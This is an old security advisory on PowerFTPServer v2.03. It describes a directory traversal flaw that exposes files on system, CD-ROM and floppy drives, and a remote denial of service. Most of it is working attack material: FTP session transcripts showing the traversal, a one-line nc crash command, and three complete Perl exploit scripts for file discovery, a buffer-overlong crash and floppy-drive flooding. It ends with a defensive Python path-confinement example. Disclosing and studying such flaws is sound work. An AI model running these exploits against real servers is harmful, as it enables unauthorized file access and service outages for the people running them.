
PowerFTPServer DoS



29th Nov 2001 [SBWID-4886]
COMMAND

	PowerFTPServer DoS

SYSTEMS AFFECTED

	PowerFTPServer v2.03

PROBLEM

	Alex Hernandez posted the following:


	PowerFTP Server is an FTP server for Windows 9x/NT/2000. A bug allows any
	user to change to any directory, see files in any PATH and also GET files
	remotely.


	PowerFTP is a powerful FTP client/server software. The feature of
	PowerFTP is the function of multiple thread downloading and uploading.
	It can even split one big file into several parts, and it can make your
	computer a standard FTP server, but big HOLES exist:


	 1) Revealing sensitive data REMOTE with a restricted account on drives
	    CDROM, Floppy and HDD. Proof of concept.
	 2) Exploit code data revealing (Remote).
	 3) Remote DoS proof of concept.
	 4) Exploit code DoS (Remote).
	 5) Exploit code DoS attack Floppy Drive (Remote).

	

	

	 Proof of concept

	# uname -a
	SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
	#

	# ftp 10.0.0.1
	Connected to 10.0.0.1.
	220 Personal FTP Server ready
	Name (10.0.0.1:root): temp
	331 Password required for temp.
	Password:
	230 User temp logged in.
	ftp>
	ftp> pwd
	257 "C:/WINDOWS/Application Data/Microsoft/Internet Explorer/Quick Launch/Mis documentos/tools/" is current directory.

	ftp> cd .../.../
	501 CWD failed. Cannot accept relative path using dot notation
	ftp>

	

	 ------oOo------
	 (1) Revealing data on the C:\ drive, floppy A:\ and CDROM. If you run
	 something, in this case an ENCARTA 2001 installation CD in Spanish
	 exists, you can see all the files.
	 ------oOo------

	ftp> ls ../../../../../../../
	200 Port command successful.
	150 Opening data connection for directory list.
	SUHDLOG.DAT
	COMMAND.COM
	BOOTLOG.PRV
	FRUNLOG.TXT
	DOS
	AUTOEXEC.DOS
	CONFIG.DOS
	VIDEOROM.BIN
	CONFIG.SYS
	DBLSPACE.BIN
	MSDOS.SYS
	MSDOS.---
	SETUPLOG.TXT
	WINDOWS
	test.txt.txt
	#
	226 File sent ok
	remote: ../../../../../../../
	561 bytes received in 0.12 seconds (4.61 Kbytes/s)
	ftp>

	

	 ------oOo------
	 Another method exists to view the "c:\" drive; type the following:
	 ------oOo------

	ftp> ls c:/
	200 Port command successful.
	150 Opening data connection for directory list.
	SUHDLOG.DAT
	COMMAND.COM
	BOOTLOG.PRV
	FRUNLOG.TXT
	DOS
	[...]

	 ------oOo------
	 To list the files on the CDROM drive type the following:
	 ------oOo------

	ftp> ls d:/
	200 Port command successful.
	150 Opening data connection for directory list.
	00000001.LT1
	AREF
	AUTORUN.EXE
	AUTORUN.INF
	AUTORUN.INI
	CLCD16.DLL
	CLCD32.DLL
	CLUF.TXT
	D6F04BA8.BIN
	DPLAYERX.DLL
	DRVMGT.DLL
	EE
	EEAUTO.ICO
	[...]

	 ------oOo------
	 To list the files on the floppy drive type the following:
	 ------oOo------

	ftp> ls a:/
	200 Port command successful.
	150 Opening data connection for directory list.

	NOTE: If no diskette exists, you can hear the drive running :-).
	

	 ------oOo-------------
	 Exploit Code PowerFTP_data.pl
	 ------oOo-------------

	#!/usr/bin/perl
	# Simple script to view the files from the ftp server,
	# even if they are outside of root directory.
	#
	# This script assumes OS WinNT/2k/W.x and it looks
	# for directories of IIS.
	#
	# PowerFTP Server v2.03 proof-of-concept exploit
	# By Alex Hernandez  (C)2001.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
	# G.Maggiotti & H.Oliveira.
	#
	#
	# Usage: perl -x PowerFTP_data.pl -s 
	#
	# Examples:
	#
	# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp
	# perl -x PowerFTP_data.pl -s 10.0.0.1
	#

	use Getopt::Std;
	use IO::Socket;

	print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n");
	print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

	getopts('s:l:p:',\%args);
	my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);

	$CRLF = "\015\012";
	@drives = ("c","d","e"); # Possible remote drives
	# If you need to read the floppy drive A add this line
	# @drives = ("a","c","d","e","f".......etc,etc

	$port = 21;
	$login = 'temp'; # Maybe you need to change this
	$pass = 'temp';  # Maybe you need to change this

	if (defined $args{s}) { $host = $args{s}; } else
	{ print "No host specified.\n";
	  print "Usage: $0 -s  -l  -p \n\n";exit;
	}

	if (defined $args{l}) { $login = $args{l}; }
	if (defined $args{p}) { $pass = $args{p}; }

	$sock =
	IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) ||
	die("Socket errors: $!");

	# Read the banner, then authenticate; each reply is one line.
	$sock_res = <$sock>;
	print $sock "USER $login" . $CRLF;
	$sock_res = <$sock>;
	print $sock "PASS $pass" . $CRLF;
	$sock_res = <$sock>;

	if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; }

	print $sock "PWD" . $CRLF;
	$sock_res = <$sock>;

	print "Attempting to locate system files...";

	$win = &OS;
	$iis = &IIS;

	print "done..\n\n"; close($sock);

	print "Windows directory: $win\n";
	print "IIS directory: $iis\n";
	print "Try manually on FTPserver $host: dir c:/\n\n";
	exit;

	# Probe each drive for a well-known Windows directory name.
	sub OS {
	my @win_dirs = ("win","windows","winnt","winme");
	        foreach $drive (@drives)
	        {
	                foreach $dir (@win_dirs)
	                {
	                        print ".";
	                        print $sock "NLST $drive:/$dir/" . $CRLF;
	                        $sock_res = <$sock>;

	                        if ($sock_res =~ /213\s/)
	                        {return("$drive:\\$dir");}
	                }
	        }
	return("not found");
	}

	# Probe each drive for the default IIS web root directories.
	sub IIS {
	my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/");
	        foreach $drive (@drives)
	        {
	                foreach $file (@iis_files)
	                {
	                        print ".";
	                        print $sock "NLST $drive:/$file" . $CRLF;
	                        $sock_res = <$sock>;
	                        if ($sock_res =~ /213\s/) {
	                                $file =~ s/\//\\/g;  # report with backslashes
	                                return("$drive:\\$file");
	                        }
	                }
	        }

	return("not found");
	}

	

	

	 ------oOo------
	 Remote Denial Of service
	 ------oOo------

	# uname -a
	SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10
	#

	# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
	220 Personal FTP Server ready
	#

	Crashes the system and the admin needs to restart the service!
	 

	

	 ------oOo-------------
	 Exploit Code DoS PowerFTP_Dos.pl
	 ------oOo-------------

	#!/usr/bin/perl
	# Simple script to send a long 'A^s' command to the server,
	# resulting in the ftpd crashing
	#
	# PowerFTP Server v2.03 proof-of-concept exploit
	# By Alex Hernandez  (C)2001.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
	# G.Maggiotti & H.Oliveira.
	#
	#
	# Usage: perl -x PowerFTP_Dos.pl -s 
	#
	# Example:
	#
	# perl -x PowerFTP_Dos.pl -s 10.0.0.1
	# 220 Personal FTP Server ready
	# Crash was successful !
	#

	use Getopt::Std;
	use IO::Socket;

	print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
	print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

	getopts('s:', \%args);
	if(!defined($args{s})){&usage;}
	$serv = $args{s};
	$foo = "A"; $number = 2048;
	$data .= $foo x $number; $EOL="\015\012";

	$remote = IO::Socket::INET->new(
	                    Proto => "tcp",
	                    PeerAddr => $args{s},
	                    PeerPort => "ftp(21)",
	                ) || die("Unable to connect to ftp port at $args{s}\n");

	$remote->autoflush(1);
	print $remote "$data". $EOL;
	while (<$remote>){ print }
	print("\nCrash was successful !\n");

	sub usage {die("\nUsage: $0 -s \n\n");}

		

	 

	 ------oOo-------------
	 Exploit Code DoS attack floppy remote PowerFTP_floppy.pl
	 ------oOo-------------

	#!/usr/bin/perl
	#
	# Even though the server will deny access, the slow hardware
	# will still hang the machine. This program attempts to
	# exploit this weakness by sending the 'NLST a:/' command to
	# the server
	#
	# PowerFTP Server v2.03 proof-of-concept exploit
	# By Alex Hernandez  (C)2001.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
	# G.Maggiotti & H.Oliveira.
	#
	#
	# Usage: perl -x PowerFTP_floppy.pl    
	#
	# Example:
	#
	# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
	#

	use IO::Socket;

	print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
	print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

	#$NUMBER_TO_SEND = 3000;
	$BUFF = 3000;

	if ( scalar @ARGV < 4 ) {
	    print "Usage: $0    \n";
	    exit();
	}

	$target = $ARGV[ 0 ];
	$port = $ARGV[ 1 ];
	$username = $ARGV[ 2 ];
	$password = $ARGV[ 3 ];

	print "Creating socket... ";
	$sock = new IO::Socket::INET( PeerAddr => $target,
	                              PeerPort => int( $port ),
	                              Proto => 'tcp' );
	die "$!" unless $sock;
	print "done.\n";

	read( $sock, $buffer, 1 );

	print "Sending username...";
	print $sock "USER " . $username . "\n";
	read( $sock, $buffer, 1 );
	print "done.\n";

	print "Sending password...";
	print $sock "PASS " . $password . "\n";
	read( $sock, $buffer, 1 );
	print "done.\n";

	print "DoS Attack floppy server...";
	for( $i = 0; $i < $BUFF; $i++ ) {
	    print $sock "NLST a:/\n";
	    read( $sock, $buffer, 1 );
	}

	print "done.\n";

	close( $sock );
	exit();

	

SOLUTION

	None yet.
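	The advisory lists no vendor fix. As an added example (not PowerFTP's code; written here for illustration), the two server-side checks that would have refused every request in the transcripts above: confining each client path to the configured root after normalization (so ../ chains, rooted paths and drive letters such as c:/, d:/ and a:/ are rejected, while a harmless name like .../... is not), and dropping an oversize control-channel line before it reaches a parser. The root C:\ftproot, the 512-byte cap and the reply texts are assumptions; ntpath emulates Windows path rules, so it runs on any platform.

```python
import ntpath

MAX_CMD_LINE = 512       # assumption: cap for one control-channel line
ROOT = r"C:\ftproot"     # constructed example root, not PowerFTP's default


def resolve_within_root(root, cwd, requested):
    """Map a client-supplied FTP path to a physical Windows path under root.

    cwd is the client's current directory relative to root ("" for root).
    Returns the normalized physical path, or None when the request would
    resolve outside root: a drive letter (c:/, d:/, a:/), a rooted path,
    or a ../ chain that climbs past the root directory.
    """
    root_abs = ntpath.normcase(ntpath.normpath(root))
    # A drive letter (or UNC prefix) addresses another volume outright.
    if ntpath.splitdrive(requested)[0]:
        return None
    # ntpath.join lets a rooted component replace the path and normpath
    # collapses ../ chains, so check containment of the *resolved* path
    # instead of scanning the request text for dot patterns.
    candidate = ntpath.normcase(
        ntpath.normpath(ntpath.join(root_abs, cwd, requested)))
    try:
        inside = ntpath.commonpath([root_abs, candidate]) == root_abs
    except ValueError:   # different drives, or absolute mixed with relative
        inside = False
    return candidate if inside else None


def handle_command(line, cwd="", root=ROOT):
    """Return an FTP reply (code, text) for one control-channel line."""
    if len(line) > MAX_CMD_LINE:
        # Refuse the 2048-byte line from the advisory before parsing it.
        return "500", "Command line too long"
    verb, _, arg = line.rstrip("\r\n").partition(" ")
    verb = verb.upper()
    if verb in ("CWD", "NLST", "LIST", "RETR"):
        if resolve_within_root(root, cwd, arg) is None:
            return "550", "Requested path is outside the server root"
        return ("250" if verb == "CWD" else "150"), "OK"
    return "502", "Command not implemented"
```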

